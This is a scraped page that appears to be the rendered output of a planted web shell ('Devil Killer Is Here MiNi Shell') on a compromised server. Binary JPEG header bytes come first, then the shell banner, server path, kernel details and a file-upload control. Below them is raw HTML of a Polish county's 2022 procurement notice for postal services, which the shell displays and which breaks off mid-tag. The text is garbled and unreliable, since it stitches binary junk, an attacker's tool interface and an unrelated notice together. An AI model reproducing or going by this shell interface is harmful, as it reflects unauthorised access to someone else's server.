JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221115/0043907801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> ŚWIADCZENIE USŁUG POCZTOWYCH NA RZECZ STAROSTWA POWIATOWEGO W KOLE W OBROCIE KRAJOWYM I ZAGRANICZNYM </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Kolski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 311620839</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Sienkiewicza 21/23</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Koło</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL414 - Koniński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@starostwokolskie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.starostwokolskie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ŚWIADCZENIE USŁUG POCZTOWYCH NA RZECZ STAROSTWA POWIATOWEGO W KOLE W OBROCIE KRAJOWYM I ZAGRANICZNYM </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ab834dcb-64c4-11ed-abdb-a69c1593877c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00439078</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00006387/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Świadczenie usług pocztowych na rzecz Starostwa Powiatowego w Kole w obrocie krajowym i zagranicznym</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://starostwokolskie.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://starostwokolskie.ezamawiajacy.pl oraz poczta elektroniczna zp@starostwokolskie.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)	wszelkie oświadczenia, wnioski, zawiadomienia oraz inne informacje Zamawiający <br/>i Wykonawcy przekazują faksem, drogą elektroniczną (poczta elektroniczna) lub poprzez Platformę Zakupową,<br/>2)	oświadczenia, wnioski, zawiadomienia i inne informacje oraz pytania kierowane <br/>do Zamawiającego przekazywane za pomocą faksu należy kierować na nr faksu Zamawiającego podany na stronie tytułowej SWZ, <br/>3)	oświadczenia, wnioski, zawiadomienia i inne informacje oraz pytania <br/>do Zamawiającego przekazywane za pomocą poczty elektronicznej należy kierować na adres poczty elektronicznej Za¬mawiającego podany na stronie tytułowej SWZ,<br/>4)	każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt otrzymania oświadczeń, wniosków, zawiadomień oraz innych informacji przekazanych za pomocą faksu lub pocztą elektroniczną.<br/>5)	Ofertę oraz dokumenty, które się na nią składają należy opatrzeć kwalifikowanym podpisem elektronicznym bądź podpisem zaufanym lub podpisem osobistym, przez osobę/y upoważnioną/e do reprezentowania wykonawcy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">klauzula informacyjna zawarta w rozdziale XXXVI SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">klauzula informacyjna zawarta w rozdziale XXXVI SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.272.19.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia obejmuje sukcesywne świadczenie usług pocztowych, przez Wykonawcę, w obrocie krajowym i zagranicznym na rzecz Starostwa Powiatowego w Kole. Zakres usług obejmuje przyjmowanie, przemieszczanie i doręczanie przesyłek pocztowych oraz ich ewentualnych zwrotów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">64110000-0 - Usługi pocztowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">64112000-4 - Usługi pocztowe dotyczące listów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punkty przyznawane za kryterium „cena zamówienia” będą liczone wg następującego wzoru spośród ofert niepodlegajacych odrzuceniu:<br/><br/>C = (Cn : Cb) x waga<br/><br/>gdzie:<br/>C - ilość punktów przyznana danej ofercie,<br/>Cn – najniższa cena spośród wszystkich ofert,<br/>Cb - cena oferty badanej,<br/>waga – 60<br/><br/>Punkty przyznawane za kryterium „Liczba placówek na terenie powiatu kolskiego i miasta Koła” będą przyznawane w następujący sposób: <br/><br/>Punkty w tym kryterium zostaną przyznane w przypadku wykazania przez Wykonawcę Zamawiającemu ilości placówek na terenie powiatu kolskiego i miasta Koła.<br/>Placówki pocztowe znajdujące się na terenie powiatu kolskiego i miasta Koła powinny spełniać minimum poniższe wymagania:<br/>a)	czynne co najmniej 6 godz. we wszystkie dni robocze z wyjątkiem dni ustawowo wolnych od pracy,<br/>b)	oznakowane w sposób widoczny nazwą lub logo Wykonawcy,<br/>Podczas gdy placówka znajduje się w lokalu, w którym prowadzona jest również inna działalność gospodarcza, wówczas musi:<br/>a)	posiadać wyodrębnione stanowisko do obsługi klientów w zakresie usług pocztowych,<br/>b)	być w widoczny sposób oznakowane nazwą lub logo Wykonawcy,<br/>c)	posiadać widoczną informację o godzinach pracy w zakresie usług pocztowych,<br/>d)	zapewnić przetwarzanie danych osobowych zgodnie z przepisami właściwymi w zakresie ochrony danych osobowych (art. 41 ust. 1 ustawy Prawo pocztowe)<br/>Zamawiający będzie punktował powyższe kryterium w sposób następujący:<br/>a)	przynajmniej po jednej placówce na terenie każdej gminy z powiatu kolskiego i dwie placówki na terenie miasta Koła – 10 pkt,<br/>b)	przynajmniej po jednej placówce na terenie każdej gminy z powiatu kolskiego i więcej niż dwie placówki na terenie miasta Koła – 20 pkt,<br/>c)	powyżej jednej placówki na terenie każdej gminy z powiatu kolskiego i więcej niż dwie placówki na terenie miasta Koła – 30 pkt<br/>Na potwierdzenie posiadania zdeklarowanych placówek należy do oferty załączyć wykaz ich adresów.<br/>W przypadku gdy Wykonawca nie zadeklaruje ilości placówek zarówno na terenie gmin powiatu kolskiego jak i miasta Koła otrzyma 0 punktów.<br/><br/>Punkty przyznawane za kryterium „Możliwość śledzenia przez Internet rejestrowanych przesyłek w obrocie krajowym i zagranicznym” będą przyznawane w następujący sposób:<br/>a)	możliwość śledzenia przez Internet rejestrowanych przesyłek pocztowych w obrocie krajowym i zagranicznym – 10 pkt,<br/>b)	brak możliwości śledzenia przez Internet rejestrowanych przesyłek pocztowych w obrocie krajowym i zagranicznym – 0 pkt,<br/>Zamawiający udzieli zamówienia Wykonawcy, który otrzyma łączną najwyższą ilość punktów, oraz będzie odpowiadał wszystkim wymaganiom stawianym w niniejszym ogłoszeniu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">liczba placówek na terenie powiatu kolskiego i miasta Koła</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">śledzenie przez internet rejestrowanych przesyłek w obrocie krajowym i zagranicznym</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na potwierdzenie spełnienia warunków udziału w postępowaniu Wykonawcy składają następujące podmiotowe środki dowodowe w poszczególnym zakresie:<br/><br/>a)Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/> Zamawiający uzna spełnienie przedmiotowego warunku jeżeli Wykonawca wykaże, iż jest wpisany do rejestru operatorów pocztowych, prowadzonego przez Prezesa Urzędu Komunikacji Elektronicznej, zgodnie z art. 6 ustawy Prawo pocztowe w zakresie obrotu krajowego i zagranicznego. (tekst jednolity Dz.U. z 2020 poz. 1041 z późn. zm.).<br/><br/>b)	Sytuacji ekonomicznej lub finansowej:<br/>Wykonawca złoży dokument potwierdzający, że Wykonawca nie zalega z opłacaniem podatków w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp – wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem (w przypadku zaległości z opłacaniem podatków wraz z zaświadczeniem należy złożyć dokument potwierdzający, że odpowiednio przed upływem terminu składania ofert dokonał płatności należnych podatków wraz z odsetkami lub grzywną lub zawarł wiążące porozumienie w sprawie spłat tych należności).<br/><br/>c)	Zdolności technicznej lub zawodowej:<br/>c1) wykaz dwóch usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie o wartości co najmniej 200.000,00 zł netto każda, tożsamych z przedmiotem zamówienia przez okres co najmniej 12 miesięcy wraz z załączeniem dowodów określających czy te usługi zostały wykonane należycie lub są wykonywane należycie (przy czym dowodami takimi są referencje lub inne dokumenty sporządzone przez podmiot na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane. Jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy). – zgodnie z załącznikiem nr 5<br/>c2) zamawiający uzna spełnienie przedmiotowego warunku, jeżeli Wykonawca wykaże udział pojazdów elektrycznych lub pojazdów napędzanych gazem ziemnym we flocie pojazdów użytkowanych przy wykonywaniu umowy zgodnie z art. 68 ust. 3 ustawy z dnia 11 stycznia 2018 roku o elektromobilności i paliwach alternatywnych. – warunek regulowany w umowie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Sytuacji ekonomicznej lub finansowej:<br/>Wykonawca złoży dokument potwierdzający, że Wykonawca nie zalega z opłacaniem podatków w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp – wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem (w przypadku zaległości z opłacaniem podatków wraz z zaświadczeniem należy złożyć dokument potwierdzający, że odpowiednio przed upływem terminu składania ofert dokonał płatności należnych podatków wraz z odsetkami lub grzywną lub zawarł wiążące porozumienie w sprawie spłat tych należności).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Uprawnienie do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający uzna spełnienie przedmiotowego warunku jeżeli Wykonawca wykaże, iż jest wpisany do rejestru operatorów pocztowych, prowadzonego przez Prezesa Urzędu Komunikacji Elektronicznej, zgodnie z art. 6 ustawy Prawo pocztowe w zakresie obrotu krajowego i zagranicznego. (tekst jednolity Dz.U. z 2020 poz. 1041 z późn. zm.).<br/><br/>-Zdolności technicznej lub zawodowej:<br/>1) wykaz dwóch usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie o wartości co najmniej 200.000,00 zł netto każda, tożsamych z przedmiotem zamówienia przez okres co najmniej 12 miesięcy wraz z załączeniem dowodów określających czy te usługi zostały wykonane należycie lub są wykonywane należycie (przy czym dowodami takimi są referencje lub inne dokumenty sporządzone przez podmiot na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane. Jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy). – zgodnie z załącznikiem nr 5<br/>2) zamawiający uzna spełnienie przedmiotowego warunku, jeżeli Wykonawca wykaże udział pojazdów elektrycznych lub pojazdów napędzanych gazem ziemnym we flocie pojazdów użytkowanych przy wykonywaniu umowy zgodnie z art. 68 ust. 3 ustawy z dnia 11 stycznia 2018 roku o elektromobilności i paliwach alternatywnych. – warunek regulowany w umowie.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1)	oświadczenia zgodnie z załącznikiem 1, - w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, każdy z nich składa oddzielne oświadczenie<br/>2)	dokument potwierdzający, że Wykonawca jest wpisany do rejestru operatorów pocztowych, prowadzonego przez Prezesa Urzędu Komunikacji Elektronicznej, zgodnie z art. 6 ustawy Prawo pocztowe, w zakresie obrotu krajowego i zagranicznego,<br/>3)	zobowiązanie podmiotu trzeciego zgodnie z załącznikiem nr 2, wraz z podmiotowymi środkami dowodowymi potwierdzającymi, że nie zachodzą wobec niego podstawy wykluczenia z postępowania oraz spełnia warunki udziału w postepowaniu (zaświadczenie z urzędu skarbowego o niezaleganiu w odprowadzeniu podatków,),<br/>4)	dokumenty potwierdzające uprawnienia osób podpisujących ofertę Wykonawcy do działania w jego imieniu – (KRS, CEDiK – wykonawca nie jest zobowiązany do złożenia tych dokumentów, jeśli zamawiający może je pobrać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał w druku oferta dane umożliwiające dostęp do tych dokumentów) pełnomocnictwo (jeżeli dotyczy). Pełnomocnictwo powinno zostać złożone albo w formie oryginału albo uwierzytelnionej notarialnie kopii,<br/>5)	pełnomocnictwo do składania oferty łącznej w zakresie określonym w art. 23 ust. 2 Ustawy, jeżeli jest wymagane,<br/>6)	podwykonawstwo zgodnie z załącznikiem nr 3 (jeżeli dotyczy). Podwykonawca składa tylko oświadczenie zgodne z załącznikiem nr 1 w części go dotyczącej,<br/>7)	wykaz adresów placówek zadeklarowanych do oceny punktowej wg załącznika nr 4 - nie podlega uzupełnieniu<br/>8)	formularz cenowy zgodnie z załącznikiem nr 6 – nie podlega uzupełnieniu <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1)	oświadczenia zgodnie z załącznikiem 1, - w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, każdy z nich składa oddzielne oświadczenie<br/>2)	dokument potwierdzający, że Wykonawca jest wpisany do rejestru operatorów pocztowych, prowadzonego przez Prezesa Urzędu Komunikacji Elektronicznej, zgodnie z art. 6 ustawy Prawo pocztowe, w zakresie obrotu krajowego i zagranicznego,<br/>3)	zobowiązanie podmiotu trzeciego zgodnie z załącznikiem nr 2, wraz z podmiotowymi środkami dowodowymi potwierdzającymi, że nie zachodzą wobec niego podstawy wykluczenia z postępowania oraz spełnia warunki udziału w postepowaniu (zaświadczenie z urzędu skarbowego o niezaleganiu w odprowadzeniu podatków,),<br/>4)	dokumenty potwierdzające uprawnienia osób podpisujących ofertę Wykonawcy do działania w jego imieniu – (KRS, CEDiK – wykonawca nie jest zobowiązany do złożenia tych dokumentów, jeśli zamawiający może je pobrać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał w druku oferta dane umożliwiające dostęp do tych dokumentów) pełnomocnictwo (jeżeli dotyczy). Pełnomocnictwo powinno zostać złożone albo w formie oryginału albo uwierzytelnionej notarialnie kopii,<br/>5)	pełnomocnictwo do składania oferty łącznej w zakresie określonym w art. 23 ust. 2 Ustawy, jeżeli jest wymagane,<br/>6)	podwykonawstwo zgodnie z załącznikiem nr 3 (jeżeli dotyczy). Podwykonawca składa tylko oświadczenie zgodne z załącznikiem nr 1 w części go dotyczącej <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Druk Oferta <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> warunek regulowany w SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> rodzaj oraz zakres zmian reguluje projekt umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 